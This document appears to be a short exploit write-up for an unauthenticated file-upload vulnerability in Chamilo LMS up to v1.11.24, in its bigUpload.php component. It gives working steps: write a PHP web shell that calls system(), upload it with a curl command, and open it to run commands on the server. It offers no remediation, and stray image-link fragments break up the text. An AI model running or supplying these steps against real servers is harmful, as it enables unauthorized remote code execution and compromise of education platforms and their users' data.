Unrestricted file upload in big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.
The big file upload functionality by /main/inc/lib/javascript/bigupload/inc/bigUpload.php allows arbitrary files to be uploaded to /main/inc/lib/javascript/bigupload/files directory within the web root.
-
If
/main/inc/lib/javascript/bigupload/filesdirectory exist we can upload Arbitrary file as; -
Create a malicious php file
echo '<?php system("whoami"); ?>' > dollarboysushil.php.png)
-
We can then upload this file by issuing following command
`$ curl -F 'bigUploadFile=@dollarboysushil.php' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`.png)
-
We can check our file is uploaded by visiting the
/main/inc/lib/javascript/bigupload/filesdirectory.png)
-
And we can execute it by clicking the php file, which gives the output of
whoamicommand.png)
.png)
.png)
.png)
.png)